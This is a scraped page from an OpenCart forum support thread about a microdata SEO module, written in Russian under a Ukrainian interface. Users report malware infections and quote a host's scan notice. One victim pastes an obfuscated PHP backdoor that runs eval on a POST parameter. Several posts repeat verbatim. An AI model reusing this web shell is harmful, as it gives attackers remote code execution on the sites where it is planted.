DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX
Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options...
investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options...
WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options...
investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options...
Recommended Posts